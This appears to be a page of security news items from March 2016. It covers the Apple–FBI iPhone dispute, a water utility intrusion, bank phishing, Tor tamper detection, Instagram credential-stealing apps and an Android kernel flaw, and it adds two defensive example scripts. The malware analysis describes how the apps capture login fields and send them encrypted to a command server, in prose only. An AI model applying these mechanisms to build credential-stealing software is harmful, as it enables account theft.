Apple zatím bojuje s příkazem federálního soudu, aby vytvořil speciální verzi iOS 9, která by odstranila bezpečnostní opatření na iPhonu 5c, používaný Syedem Rizwanem Farookem, strůjcem masakru v San Bernardinu.
Naplnění rozsudku se obává mnoho technologických společností, neboť by vládě poskytl snadný způsob, jak podkopat šifrovací systém jejich produktů.
Americký úřad spravedlnosti v pondělí uvedl, že pátrá po jiných možnostech, jak se dostat to iPhonu Farooka. V tom případě by pomoc Applu stát nepotřeboval.
Perry dále napsal, že společnost Tor Project „stojí za Applem a jeho rozhodnutím bránit šifrování a odporovat tlaku vlády. Nikdy nevytvoříme zadní vrátka pro náš software.“
Tor, zkratka pro The Onion Router („cibulový router“) je síť, která poskytuje anonymní přístup k internetu pomocí upraveného prohlížeče Firefox. Projekt započala Laboratoř pro námořní výzkum ve Spojených státech, ale teď ji řídí nezisková organizace Tor Project.
Prohlížení webu je šifrováno a zajišťováno skrze různé proxy servery, což výrazně stěžuje možnost zjistit skutečnou IP adresu počítače. Tor je životně důležitá aplikace pro aktivisty a disidenty, neboť poskytuje silnou vrstvu soukromí a anonymity.
Některé z funkcí Toru však využili též kriminální živly, především kyberzločinci. To vyvolalo zájem u bezpečnostních agentur po celém světě. Tisíce webů běží skrytě na systému Toru a mají speciální „.onion“ URL; dá se tak na ně připojit pouze skrze upravený prohlížeč.
The Silk Road, „hedvábná stezka,“ byl undegroundový, částečně ilegální trh, zavřený FBI v říjnu 2013. Šlo o jednu z nejznámějších služeb, využívajících pro svou činnost právě Tor.
FBI may have found a New Way to Unlock Shooter's iPhone without Apple
23.3.2016 Apple
There's more coming to the high-profile Apple vs. FBI case.
The Federal Bureau of Investigation (FBI) might not need Apple's assistance to unlock the iPhone 5C that belonged to San Bernardino shooter Syed Rizwan Farook.
If you have followed the San Bernardino case closely, you probably know everything about the ongoing encryption battle between the FBI and Apple.
In short, the US Department of Justice (DOJ) wants Apple to help the FBI create a backdoored version of its iOS operating system that could let it access data on Farook's locked iPhone 5C.
Apple, meanwhile, is adamant, saying that the FBI wants the company to effectively create the "software equivalent of cancer", something that would likely open up all iPhones to malicious hackers.
FBI to Apple: We'll Unlock iPhone by Our Own
Now the Feds say they may be able to crack the iPhone without Apple's assistance after all.
In a court filing [PDF] submitted on Monday in a central California federal court, the DOJ filed a motion to cancel Tuesday's hearing and to stay the proceedings at least until next month.
United States Magistrate Sheri Pym, the judge who previously ordered Apple to help the FBI unlock the encrypted iPhone, granted the request.
The hearing was cancelled because the FBI wants time to test an alternative method of unlocking the shooter's iPhone, one that will not involve Apple building a backdoored iOS version.
Although the DOJ declined to comment on who is providing help to the FBI, this doesn't mean the case has been closed because the Feds still have to make sure their new technique will work.
"On Sunday, March 20, 2016, an outside party demonstrated to the FBI a possible method for unlocking Farook's iPhone," the motion reads.
"Testing is required to determine whether it is a [feasible] method that'll not compromise data on Farook's iPhone. If the method is viable, it should eliminate the need for the assistance from Apple set forth in the All Writs Act Order in this case."
FBI Wants Encryption Backdoor to Unlock More iPhones
The Feds may well have had this alternative method all along but sought Apple's help to create a backdoor so that they could use the precedent in other pending cases: the agency is seeking Apple's help to unlock iPhones in at least nine other cases.
But there are some points the FBI must keep in mind before trying its alternative way into Farook's iPhone 5C.
If you copy the phone's storage, the data in the copy remains encrypted and is of no use by itself.
If you enter 10 wrong passcodes, the iPhone's data is wiped (when the erase-data setting is enabled), which means that if your method fails you may never recover the data from the shooter's iPhone.
However, if the FBI method isn't able to unlock Farook's iPhone, the agency will again have to go back to the court to enforce the order on Apple.
Who, according to you, is this outside party?
Hacker? Security researcher? Or some Cyber-forensic expert? Let us know in the comments below.
Cyber attacks on systems at a water utility, a scaring reality
23.3.2016 Computer Attack
According to the recent Verizon breach digest for March 2016 hackers breached a water utility and manipulated systems for water treatment and flow control.
The story is a disturbing one: according to the Verizon breach digest for March 2016, a group of hackers breached a water utility and manipulated the systems used for water treatment and flow control.
The Verizon breach digest describes a number of cyber attacks, including one against an unnamed water utility referred to in the document as the Kemuri Water Company (KWC).
The operator of the water utility hired Verizon to assess its systems, and during the investigation the experts found evidence of cyber attacks.
The experts found a dismal situation: a number of systems affected by critical vulnerabilities were exposed to the Internet, and the overall architecture included outdated operational technology (OT) systems.
"The OT end of the water district relied heavily on antiquated computer systems running operating systems from ten plus years ago." states the report.
The entire control infrastructure relied on an IBM AS/400, a platform that dates back to 1988, which the operator used to control every OT device in the facility (i.e. the valve and flow control application) as well as IT functions (i.e. billing). More disconcerting still, a single employee, or an attacker, could manage the entire utility by gaining access to that AS/400. If a data breach were to occur at KWC, this "SCADA platform" would be the first place to look.
“Even more concerning, many critical IT and OT functions ran on a single AS400 system. KWC referred to this AS400 system as its “SCADA platform.” This system functioned as a router with direct connections into several networks, ran the water district’s valve and flow control application that was responsible for manipulating hundreds of Programmable Logic Controllers (PLCs), housed customer PII and associated billing information, as well as KWC’s financials.”
The experts found that the KWC facility had been targeted by hacktivists who breached the internal network by exploiting a vulnerability in the payment application's web server.
Once they had compromised that server, the attackers obtained the internal IP address and admin login credentials of the AS/400, and used them to steal 2.5 million records containing customer and payment data. Fortunately, the attackers did not use the stolen data for fraud.
With access to the AS/400, the attackers were also able to take full control of the water flow and of the amount of chemicals used to treat the water.
During the 60-day assessment period the experts identified four connections to the utility's systems. The threat actors modified application settings, fortunately without the knowledge needed to cause serious damage. The good news is that the alerting systems allowed early identification of anomalies in the controlled processes.
Now imagine the possible effects of a cyber attack launched by a persistent nation-state actor with deep knowledge of the utility's internal processes.
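The alerting that caught the anomalous setting changes at KWC is the one control in this story that worked. As an added example (not from the Verizon report and not KWC's tooling), the following Node.js script shows the kind of write-audit monitor that would have flagged the intrusion early: it parses constructed audit records of writes to the valve and flow control application and raises an alert when a setpoint write comes from a host outside the engineering allowlist, leaves its safe operating band, or jumps further than an operator would normally move it in one step. The log format, host addresses, tag names and safe bands are all constructed for this example.

```javascript
'use strict';
// Added example: a minimal OT write-audit monitor. Everything below (log
// format, hosts, tags, bands) is constructed for illustration, not KWC data.

// Constructed audit lines: one per operation against the control application.
// The writes from 172.16.9.40 model the attacker coming in through the
// compromised payment web server with the stolen admin credentials.
const SAMPLE_LOG = [
  '2016-03-10T01:02:11Z src=10.20.0.15 user=ops1 op=WRITE tag=CHLORINE_DOSE_SETPOINT old=1.8 new=1.9',
  '2016-03-10T01:40:03Z src=10.20.0.15 user=ops1 op=WRITE tag=FLOW_VALVE_7_PERCENT old=60 new=62',
  '2016-03-10T02:14:07Z src=172.16.9.40 user=admin op=WRITE tag=CHLORINE_DOSE_SETPOINT old=1.9 new=6.5',
  '2016-03-10T02:14:31Z src=172.16.9.40 user=admin op=WRITE tag=FLOW_VALVE_7_PERCENT old=62 new=5',
  '2016-03-10T03:00:00Z src=10.20.0.16 user=ops2 op=READ tag=TURBIDITY_NTU',
];

// Hosts allowed to issue setpoint writes: operator/engineering stations only.
// The DMZ segment of the payment web server is deliberately absent.
const WRITE_ALLOWLIST = new Set(['10.20.0.15', '10.20.0.16']);

// Safe operating band per tag and the largest change an operator normally
// makes in a single write (constructed values).
const SAFE_BANDS = {
  CHLORINE_DOSE_SETPOINT: { min: 0.5, max: 4.0, maxStep: 1.0 },
  FLOW_VALVE_7_PERCENT:   { min: 20,  max: 100, maxStep: 25 },
};

// Parse "<timestamp> key=value key=value ..." into an object; null if the line
// does not carry an operation (so unrelated lines are skipped, not mis-scored).
function parseLine(line) {
  const m = line.match(/^(\S+)\s+(.*)$/);
  if (!m) return null;
  const rec = { ts: m[1] };
  for (const tok of m[2].split(/\s+/)) {
    const eq = tok.indexOf('=');
    if (eq > 0) rec[tok.slice(0, eq)] = tok.slice(eq + 1);
  }
  return rec.op ? rec : null;
}

// Apply the three rules to one record; returns the reasons that fired.
// Reads never alert; a write to an unknown tag alerts because it has no band.
function checkWrite(rec) {
  const reasons = [];
  if (rec.op !== 'WRITE') return reasons;
  if (!WRITE_ALLOWLIST.has(rec.src)) reasons.push('write from non-engineering host ' + rec.src);
  const band = SAFE_BANDS[rec.tag];
  if (!band) {
    reasons.push('write to tag with no defined safe band: ' + rec.tag);
    return reasons;
  }
  const oldV = parseFloat(rec.old);
  const newV = parseFloat(rec.new);
  if (newV < band.min || newV > band.max) reasons.push(`${rec.tag}=${newV} outside safe band [${band.min}, ${band.max}]`);
  if (Math.abs(newV - oldV) > band.maxStep) reasons.push(`${rec.tag} step ${oldV}->${newV} exceeds ${band.maxStep}`);
  return reasons;
}

// Scan a log; returns one alert object per offending line, in log order.
function analyzeLog(lines) {
  const alerts = [];
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    const reasons = checkWrite(rec);
    if (reasons.length) alerts.push({ ts: rec.ts, src: rec.src, user: rec.user, tag: rec.tag, reasons });
  }
  return alerts;
}

for (const a of analyzeLog(SAMPLE_LOG)) {
  console.log(`${a.ts} ALERT src=${a.src} user=${a.user} tag=${a.tag}: ${a.reasons.join('; ')}`);
}
```

On the sample log the two operator writes pass, the read is ignored, and both writes from the DMZ host trip all three rules at once. The source-host rule is the important one here: the attacker used valid admin credentials, so a monitor keyed on the user alone would have seen nothing unusual.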
"Your internet banking has been locked": fraudsters try a new trick
23.3.2016 Phishing
Fraudsters posing as employees of Česká spořitelna are trying a new trick. They tell users that their internet banking has been locked, in an attempt to get them to click a fake link so that their login credentials can be extracted. Representatives of Česká spořitelna have warned of the new phishing messages.
The new scam targets the bank's clients. "You have reached the maximum number of failed login attempts. For your protection, access to the online service has been locked," the fraudsters claim in the unsolicited message.
At the end of the text there is a link through which it is supposedly possible to restore access and continue the verification process. In this way the fraudsters easily extract from the credulous even the confirmation SMS code, with which they can then carry out any payment they like.
Attentive users can spot the scam
Although the graphics of the fraudulent email really do resemble Servis 24, Česká spořitelna's internet banking service, more attentive users can easily tell that it is a scam. The message contains a number of errors; some words, for example, are entirely missing their diacritics.
"Be very cautious with emails from unknown sources. If you suspect you have received a fraudulent email, do not under any circumstances respond to its content, do not click on any link it may contain, and forward the message to us at phishing@csas.cz. If you have already clicked the link and filled in the requested details, contact Česká spořitelna's client line immediately on the toll-free number 800 207 207," the bank's representatives advised.
People should proceed the same way if they receive an unsolicited message bearing the header of another banking institution: they should always contact their own bank.
The FBI might be able to crack the San Bernardino terrorist’s iPhone without Apple’s help
22.3.2016 Apple
The US authorities announced on Monday that they may have found a way to unlock the San Bernardino shooter's iPhone without Apple's help.
The FBI says it may have discovered a method to bypass Apple's security measures and unlock the iPhone used by one of the San Bernardino attackers, and the court hearing scheduled for today has been postponed.
We have discussed the FBI vs Apple case at length. Last week the DOJ filed a brief threatening to force Apple to hand over the iOS source code if it does not help the FBI unlock the San Bernardino shooter's iPhone, while Edward Snowden accused the FBI of lying about its ability to unlock the device.
The legal battle between Apple and the FBI has reignited the debate over strong encryption in commercial products, a design choice that, according to the authorities, hampers criminal investigations. In December 2015, Hillary Clinton called on tech companies to create a "Manhattan Project" for encryption.
Now it seems we may be at the end of the road: on Sunday, March 20, 2016, an outside party demonstrated to the US authorities a technique for unlocking the controversial iPhone.
"On Sunday, March 20, 2016, an outside party demonstrated to the FBI a possible method for unlocking Farook's iPhone," revealed the lawyers for the US Government in a court filing Monday afternoon. "Testing is required to determine whether it is a viable method that will not compromise data on Farook's iPhone. If the method is viable, it should eliminate the need for the assistance from Apple set forth in the All Writs Act Order in this case."
The court filing provides no technical details on the technique, but this could mark the end of the fight, or at least an important truce. Several third parties had offered the FBI suggestions on how it could crack the iPhone.
Apple is also worried that the San Bernardino case could set a legal precedent that would force IT giants to provide government access to users’ data even when these are protected by encryption.
In a court filing Monday, the FBI confirms that its experts have continued to look for a method to crack iPhone devices, even without the Apple’s help.
“Our top priority has always been gaining access into the phone used by the terrorist in San Bernardino,” explained the Justice Department spokeswoman Melanie Newman. “With this goal in mind, the FBI has continued in its efforts to gain access to the phone without Apple’s assistance, even during a month-long period of litigation with the company.”
Many experts speculate that the FBI plans to clone the device's storage and try passcodes against each copy, so that the limit on wrong attempts is never exhausted on a single image.
Whatever method the FBI uses, the government will file a status report by April 5 revealing the results.
The only certainty at the moment is that the order requiring Apple to help the FBI has been suspended.
On the other side, Apple's lawyers have confirmed that the company will not provide the help the FBI demanded.
Brussels explosions, dozens dead after blasts at Zaventem airport and Maalbeek metro
22.3.2016 Crime
Brussels explosions: dozens dead after blasts at Zaventem airport and Maalbeek metro station in a terror attack. Panic and chaos in the city. IS has claimed responsibility for the attack.
This morning Europe was plunged into terror again: just months after the Paris attacks, a new wave of attacks has hit the West. A sequence of explosions was detonated this morning at Brussels Airport in what is alleged to be a suicide bomber terror attack.
“We can confirm that there have been two explosions in the departure hall. We called the emergency services on the ground – they [are] now provid[ing] first aid to the injured.” said Anke Fransen, spokeswoman for the Brussels Airport.
The first two Brussels explosions hit the departure hall of Zaventem international airport shortly before 8am, next to the American Airlines check-in desk. Further explosions were reported at the Schuman and Maalbeek metro stations, not far from the EU headquarters. The explosion at Maalbeek metro station occurred about an hour later.
[Map: the Brussels explosions. Source: FT.com]
A government source confirmed to the VRT broadcaster that it was a terror attack. The number of victims is rising minute by minute; the latest reports put the toll at at least 34 dead and hundreds injured.
“A Belgian news agency is reporting that shots were fired and words in Arabic were heard being shouted before the blasts.” reported the British Mirror.
[Image: the Brussels explosions. Source: FT.com]
Local authorities are urging people to stay away from the areas under attack.
Brussels Airport's Twitter account told followers: "There have been 2 explosions at the airport."
Local media reported that as many as 14 people were killed at the airport, with hundreds injured, and 20 killed at the metro station. These numbers are not official and must be confirmed by the authorities.
The Brussels explosions come only a day after Belgium's interior minister, Jan Jambon, warned of possible terror attacks following the recent arrest of Salah Abdeslam, one of the participants in the Paris terror attacks.
My thoughts are with the people of Brussels following these ignoble attacks.
From a cyber security perspective, I invite everyone to remain vigilant: crooks will try to exploit the media attention on the Brussels explosions by sharing bogus videos and malicious links. It is likely we will see a phishing campaign trying to exploit the event.
Tor Project and the new anti-tampering measures for its software
22.3.2016 Security
The Tor Project has revealed how the organization has spent three years improving its ability to detect tampered software.
The experts at the Tor Project are working to improve the resilience of the anonymizing network to cyber attacks; in particular, they aim to quickly detect any surveillance activity conducted by tampering with the Tor software.
The researchers fear that the US Government could interfere with the project by requesting that the organization turn over critical material that would compromise the security of the network and lead to the de-anonymization of its users.
Mike Perry of the Tor Project highlighted that the organization has never received a legal demand to place a backdoor in its source code, nor any request to hand over cryptographic signing material.
The Tor Browser is open source, which means anyone can analyze it; the organization also implements several mechanisms to ensure the security and integrity of its software.
Now the experts want more: they are exploring further improvements to eliminate single points of failure, so that even if a threat actor obtains the project's cryptographic keys, the network and its users would be able to detect the anomalous activity. The development team is designing the system so that any change to the original source code becomes visible.
“For this reason, regardless of the outcome of the Apple decision, we are exploring further ways to eliminate single points of failure, so that even if a government or a criminal obtains our cryptographic keys, our distributed network and its users would be able to detect this fact and report it to us as a security issue.” wrote Mike Perry.
“From an engineering perspective, our code review and open source development processes make it likely that such a backdoor would be quickly discovered.” he added.
To distribute a tampered version of the Tor Browser, an attacker would need access to two cryptographic keys:
the SSL/TLS key that secures the connection between a user and the Tor Project servers;
the key used to sign a software update.
“Right now, two keys are required, and those keys are not accessible by the same people,” explained Perry. “They are also secured in different ways.”
Even if a persistent attacker obtained both keys, users would in theory still be able to check the software's hash and discover any modification, provided the reference hash they compare against was obtained through a channel the attacker does not control.
Who Viewed Your Profile on Instagram? Obviously, Hackers!
22.3.2016 Hacking
Are you curious about who viewed your profile on Instagram?
This is probably one of the most frequently asked questions nowadays, and there are several applications on the Google Play Store and Apple App Store that claim to let you see who is looking at your Instagram profile.
But should we believe them?
Is there really some way to find out who viewed your Instagram profile?
The short answer to all these questions is "NO": no such functionality exists on Instagram at the moment.
But thousands of users still hope there is, and hackers are taking advantage of that to target a broad audience.
Recently, security researchers discovered malicious applications on both the Google Play Store and the iOS App Store that are an outright hoax aimed at Instagram users.
The iOS app is named "InstaCare - Who cares with me?" and is one of the top apps in Germany, while the Android app, dubbed "Who Viewed Me on Instagram", has more than 100,000 downloads and 20,000 reviews.
Both apps were developed by Turker Bayram, the same developer who created the malicious "InstaAgent" app for Android and iOS late last year, which secretly stole users' Instagram credentials.
The recent applications by Bayram also have the same functionality, luring Instagram users into believing that the app would let them know who viewed their profile. The app claims to:
Show you up to most recent 100 lists for your Instagram profile.
Display your friend list in order, who cares your profile most with your profile interaction.
But in reality…
According to a blog post by David Layer-Reiss of Peppersoft, the malicious apps abuse the authentication process used to connect to Instagram in order to steal the user's Instagram username and password.
Third-party applications normally authenticate to Instagram through its API, so users are accustomed to handing their Instagram credentials to other applications and services.
Here's How an App Can Hack Your Instagram Accounts
Today it is quite easy for hackers to target a large audience: just borrow the name of a popular application and offer users a feature the legitimate one does not have.
Users will simply hand over their critical data, including their credentials, without realizing the consequences.
Once users install "InstaCare" or "Who Viewed Me on Instagram" on their iOS or Android device, they are immediately presented with a login window that forces them to log in with their Instagram credentials.
Since the apps advertise that they will show who viewed your Instagram profile, most users fall for it and enter their account credentials without a second thought.
The username and password are then encrypted and sent to the attacker's server. The attacker later uses those credentials to secretly log in, take full control of the hijacked Instagram accounts and post spam on the user's behalf.
Security researchers from Kaspersky Lab have confirmed David's findings; see Kaspersky's blog post for more technical details on the malicious apps.
At the time of writing, neither Apple nor Google had removed the malicious apps from their official stores, which means they are still available for download.
It is not at all surprising that the app stores host a number of malicious apps that catch users' attention and make them fall victim.
But the fact that both Apple and Google were fooled again by the same developer shows how hard it is to keep an eye on a developer who has already published a malicious app, and to manage the app stores securely.
Here's How to Protect Yourself
If you have already installed one of these apps and fallen for the scam, act quickly:
Uninstall the apps mentioned above from your smartphone if you have one.
Change your Instagram password immediately.
For better security, enable two-factor authentication on your Instagram account.
Who viewed your Instagram account? And who stole your password?
22.3.2016 Source: Kaspersky Hacking
Mobile applications have become one of the most efficient attack vectors, and one of the favorite methods of cybercriminals is the abuse of popular applications. Maybe you would think twice before installing any application that asks for the credentials you use to connect to your social networks, email accounts or cloud storage services?
Recently, a malicious application called “InstaCare – Who cares with me” was released via Google Play Store and App Store. David Layer-Reiss from Peppersoft, a mobile development company from Germany who discovered this threat, provided a good analysis on his blog.
This application serves as a hook to lure Instagram users, pretending to let them know who has viewed their profile; but in reality it abuses the authentication process to connect to Instagram.
In fact, it’s common for many applications to use API’s or authorization protocols such as OAuth to authenticate with third-party applications. This is very convenient for users as they can use the same credentials to authenticate with different applications and services.
The problem here is that this feature can be used maliciously for some applications to gain access to the user’s information, such as their profile and contacts, or to steal their credentials.
This isn’t the first time that this has happened. Last year we published some blog posts outlining where attackers had used malicious applications or email campaigns. Either to steal the user’s credentials – Stealing to the sound of music; or just to get access to user information – Fraudsters can have rights, too; sometimes using popular applications as a cover – Del phishing al acceso persistente (Spanish).
This kind of strategy is very successful. In this particular case, the Android version of this application alone was installed on more than 100K devices with more than 20K reviews, most of them saying that you have to pay in order for it to work correctly.
As with Google Play, we can also find some users in the App Store complaining about problems after installing this app.
It is interesting that this application was able to pass the Apple security checks and was published without any problem, even though its controls are more restrictive, without mentioning that apparently this developer already had a history of having published a malicious application before.
Attack vector
This attack installs JavaScript code into the Submit button on the Instagram login page as soon as the page has finished loading.
This code gets the content of the input fields named “username” and “password” and stores it in the local variable named “str” with the pattern “<username>,-UPPA-,<password>”. After that, it calls the function “processHTML” which stores the collected data in a class variable.
Other information is also collected from the user’s device and sent to the C&C via a POST request.
The value of the parameter “hash” is the data shown in the image above plus the Instagram username and password. This value is encrypted with AES 128 and then encoded with base64. The encryption key is generated from the ID generated by the server.
Do you want to know who viewed your Instagram account? How about your password?
The iOS version also uses AES-128, but in CBC mode rather than ECB. It therefore needs an Initialization Vector (IV), for which it uses the fixed string "IOS123SECRETKEYS".
Once opened it forces the user to login to Instagram.
After that the username and password are sent to the server, as well as some metadata.
Since we have the ID, we can decrypt the content using a modified version of the Java code published by David; only the initialization of the crypto class needs to be changed.
By feeding in the content of the "hash" parameter we can decrypt the data sent and find out what information has been sent to the server. As expected, the Instagram username and password are included in this list.
The username and password will later be used to post spam messages to the user’s Instagram account.
The threats mentioned in this blog post are detected by Kaspersky Lab products as HEUR:Trojan-Spy.AndroidOS.Instealy.a and HEUR:Trojan-Spy.IphoneOS.Instealy.a.
Conclusion
Mobile environments are one of the best targets for cybercriminals: apps usually have access to email accounts, social networks, contacts and even the places you have visited.
The use of social networking is one of the best ways to distribute malicious content. We have to be aware of unknown applications that promise something that isn’t provided by the service that we are using. Usually, if the feature does not exist on the service website, it will be hard for third-party software to provide it.
Thank you, CanSecWest16!
22.3.2016 Source: Kaspersky Safety
This year, we had the absolute pleasure of being a part of CanSecWest’s fantastic lineup of talks, well-rewarded pwnage, and entertainment among a jovial crowd of infosec practitioners of every stripe. The diversity of the crowd really cannot be overstated as your usual network defenders, hardware and software developers, threat intelligencers (like ourselves) are peppered in with a fair amount of exploit developers sizing up their competition. This year’s Pwn2Own awarded a whopping $460,000 to four out of five teams for successful exploitations of Google Chrome, Microsoft Edge, and Apple Safari browsers. Of these, Tencent Security’s Team Sniper took the lead and the title of ‘Master of Pwn’ embroidered in a pretty sweet purple smoking jacket. We only wished someone would have mastered the always difficult “VM escape”.
The mix of talks was heavily skewed towards exploitation with some very interesting vulnerabilities discussed like Haifei Li and Chong Xu’s talk on Microsoft Outlook security. This talk should’ve scared the pants off of anyone in the crowd as Haifei demoed his now patched BadWinMail exploit that allowed the mere preview of an email on outlook to pop calc.exe. This is the sort of exploit that reminds us that all of the tips and explanations we give end users don’t carry that much weight in the face of a truly advanced attacker with a sense of creativity. There were no links clicked or attachments executed, in some cases (if the malicious email is the latest received when Outlook is first run) the application will preview the malicious email without user interaction required. Zooming out a little bit, we should consider that even though many threat actors are moving away from fancy exploits (finding that inexpensive phishing or macro-laced documents provide good enough results), this is the sort of exploit that the 1% threat actors absolutely love. So perhaps the immediate takeaway should be: “Why the hell isn’t Outlook sandboxed?”
While the majority of the talks focused heavily on exploitation and vulnerabilities, our talk dealt with the usage of false flags and deception techniques by well-known (and some unknown) APT actors. We were skeptical we could hold a full crowd given the skew towards vuln-centric talks, but were pleasantly surprised by the turnout and the warm reception. As we took the crowd through a brief overview of attribution, pitfalls encountered, and techniques being utilized by the bad guys, it was clear to us this topic has not received enough attention in the community. The questions asked during and after the presentation focused mainly on opinions as to whether or not attribution is even needed in the grand scheme of things. While we don’t want to give away our secret sauce just yet (as this is an ongoing project), some of the actors we focused on included Cloud Atlas (AKA Inception Framework), Turla, Lazarus, Sofacy, big bad Duqu, and perhaps a new player. Stay tuned for a very thorough treatment of this topic.
CanSecWest has become a true favorite with GReAT researchers for its welcoming atmosphere and diverse but friendly crowd open to new research topics and hard discussions on ongoing problems. It’s rare to find such a great mix of people from all walks at a conference that isn’t so large or overly commercial. We are looking forward to CSW 2017! Won’t you join us?
Google issued an emergency patch for critical CVE-2015-1805 flaw
22.3.2016 Vulnerability
Google released an emergency security patch to fix the local elevation of privilege vulnerability CVE-2015-1805 affecting the Android OS.
Google has released an emergency security patch to fix the local elevation of privilege vulnerability CVE-2015-1805 affecting the kernel of the Android OS on certain devices.
The vulnerability is ranked as critical and can be exploited by rooting applications that users have installed on their devices to elevate privileges and run arbitrary code on the vulnerable device.
The security flaw is not new: it was discovered in the upstream Linux kernel years ago and fixed in April 2014. Unfortunately, the flaw was underestimated until last month, when the C0RE Team reported to Google that it could be exploited against the Android OS.
All unpatched Android devices running kernel versions 3.4, 3.10 and 3.14, including all Nexus devices, are vulnerable to CVE-2015-1805, while devices based on Linux kernel version 3.18 or higher are not affected.
Nexus Rooting CVE-2015-1805
Google has already blocked the installation of software that triggers the flaw, both within Google Play and outside of Google Play, through Verify Apps.
“We already block installation of rooting applications that use this vulnerability — both within Google Play and outside of Google Play — using Verify Apps, and have updated our systems to detect applications that use this specific vulnerability.” states the advisory issued by Google.”To provide a final layer of defense for this issue, partners were provided with a patch for this issue on March 16, 2016. Nexus updates are being created and will be released within a few days. Source code patches for this issue have been released to the Android Open Source Project (AOSP) repository.”
Google warns that vulnerable devices could be permanently compromised by exploiting the flaw and that in some circumstances re-flashing the operating system could be necessary in order to remove malicious applications.
“An elevation of privilege vulnerability in the kernel could enable a local malicious application to execute arbitrary code in the kernel. This issue is rated as a Critical severity due to the possibility of a local permanent device compromise and the device would possibly need to be repaired by re-flashing the operating system.” continues the advisory.
Google has collected evidence of this vulnerability being abused on a Nexus 5 using a publicly available rooting tool, but no malicious exploitation of the flaw has been observed.
Google has created Nexus updates that will be released within a few days; the company has already notified its partners of this security vulnerability.
“Source code patches for this issue have been released to the Android Open Source Project (AOSP) repository.” states the advisory.
To mitigate the risk of exposure, Android devices should have a security patch level of March 18, 2016, or a security patch level of April 2, 2016 or later.
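As an added check (example code of my own, not from the article or from Google's advisory), the following Python triages an Android device inventory against the two criteria stated above: the affected kernel series and the security patch levels that carry the fix. The inventory, its serials and its CSV layout are constructed sample data in the formats printed by `adb shell uname -r` and `adb shell getprop ro.build.version.security_patch`.

```python
import re
from datetime import date

# Kernel series the advisory lists as affected, and the first series it lists as unaffected.
AFFECTED_KERNELS = {(3, 4), (3, 10), (3, 14)}
FIRST_UNAFFECTED_KERNEL = (3, 18)
# Security patch levels carrying the fix: exactly 2016-03-18, or 2016-04-02 and later.
FIX_EXACT = date(2016, 3, 18)
FIX_FROM = date(2016, 4, 2)

# Constructed sample inventory: "serial,uname -r,ro.build.version.security_patch".
# An empty last field models a device that reports no security patch level at all.
SAMPLE_INVENTORY = """\
N5-0001,3.4.0-g3c0fcf5,2016-03-01
N5-0002,3.4.0-g3c0fcf5,2016-03-18
N6-0003,3.10.40-g1a2b3c4,2016-04-02
N9-0004,3.10.40-g1a2b3c4,
PX-0005,3.18.10-gabcdef0,2015-12-01
OLD-0006,3.0.31-g1234567,
"""


def parse_kernel(uname_r):
    """'3.10.40-g1a2b3c4' -> (3, 10). Raises ValueError on unexpected input."""
    m = re.match(r"\s*(\d+)\.(\d+)", uname_r)
    if not m:
        raise ValueError("unrecognised kernel version: %r" % uname_r)
    return int(m.group(1)), int(m.group(2))


def parse_patch_level(prop):
    """'2016-04-02' -> date; an empty property (no level reported) -> None."""
    prop = prop.strip()
    if not prop:
        return None
    return date.fromisoformat(prop)


def has_fix(patch_level):
    """Only the 2016-03-18 level, or 2016-04-02 and later, contain the fix.
    A device reporting no level at all cannot have it."""
    if patch_level is None:
        return False
    return patch_level == FIX_EXACT or patch_level >= FIX_FROM


def triage(uname_r, security_patch):
    """Classify one device: 'not affected', 'patched', 'vulnerable' or 'not listed'."""
    kernel = parse_kernel(uname_r)
    if kernel >= FIRST_UNAFFECTED_KERNEL:
        return "not affected"
    if kernel not in AFFECTED_KERNELS:
        # Kernel series the advisory does not name: flag for manual review.
        return "not listed"
    return "patched" if has_fix(parse_patch_level(security_patch)) else "vulnerable"


def triage_inventory(csv_text):
    """Map serial -> status for CSV lines of 'serial,uname -r,security_patch'."""
    results = {}
    for line in csv_text.splitlines():
        if not line.strip():
            continue
        serial, uname_r, patch = line.split(",", 2)
        results[serial] = triage(uname_r, patch)
    return results


if __name__ == "__main__":
    for serial, status in triage_inventory(SAMPLE_INVENTORY).items():
        print(serial, status)
```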
Apple Updates Everything (Again)
22.3.2016 Vulnerability
As part of today's product announcements, Apple released new operating systems across its different products. In addition to new features, these updates do address a number of security issues as well.
OS X Server 5.1 (for Yosemite 10.10.5)
This update improves warnings in case the administrator stores backups insecurely and removes old SSL ciphers (RC4). Also, authentication bypass issues are addressed in the Wiki.
Safari 9.1
The Safari update is available for OS X back to 10.9 (Mavericks). It fixes a total of 12 vulnerabilities, some of which can be used to execute arbitrary code.
OS X El Capitan 10.11.4 (Security Update 2016-002)
A total of 59 vulnerabilities are patched (I hope I counted them right). Here are some of the highlights:
Apple USB Networking (CVE-2016-1734): This vulnerability could lead to arbitrary code execution if a malicious USB device is connected to the computer.
Bluetooth (CVE-2016-1735/1736): Bluetooth can be used to execute arbitrary code. It isn't clear (but likely) that you first need to pair with the device which would mitigate the problem somewhat.
Messages (CVE-2016-1788): This vulnerability, which would allow the interception of iMessage messages has gotten a lot of press in the last couple days.
OpenSSH (CVE-2016-0777/0778): The roaming vulnerability that could lead to a leak of the private key is fixed in this patch.
Wi-Fi (CVE-2016-0801/0802): A malicious WiFi frame could be used to execute arbitrary code. Since this requires an unspecified ether type, I am assuming that this requires that the victim first associates with the network. But the advisory doesn't provide sufficient details to tell for sure.
XCode 7.3:
Two vulnerabilities. One in otool (a tool to display object files) and another two vulnerabilities in subversion.
WatchOS 2.2:
A lot of overlap here with the OS X and Safari patches. Note that the Watch is also vulnerable to the WiFi exploits, but not the Bluetooth issues.
iOS 9.3:
A total of 36 vulnerabilities, many of which are also patched for OS X. The Wifi vulnerability applies to iOS just as for the WatchOS and OS X.
TVOS 9.2
Again a lot of overlap with the other updates.
In short: patch...
For details from Apple, please refer to the usual security bulletin page: https://support.apple.com/en-us/HT201222
Coming soon, Denmark’s intelligence presents the Danish Hacker Academy
21.3.2016 Hacking
The Danish intelligence agency PET (Politiets Efterretningstjeneste) plans to start its Danish hacker academy to fight threat actors in cyberspace.
Denmark’s PET (Politiets Efterretningstjeneste), the country’s intelligence agency, announced last week plans to create a government ‘hacker academy’ in response to the need to improve the country’s cyber security.
The Danish hacker academy is a hacking school that will train black hat hackers for offensive and defensive purposes, starting from August 1, 2016.
The Danish security and intelligence service PET will recruit talented IT nerds interested in supporting the activities of the Danish Government in cyberspace. PET is worried by the militarization of cyberspace: foreign governments could use cyber tools for offensive purposes such as cyber espionage and sabotage.
The Danish intelligence also plans to train its cyber army against terrorist organisations online.
The Danish Government has launched a media campaign using the following slogan:
“Have you got what it takes to become a member of a secret elite unit?”
Danish hacker academy
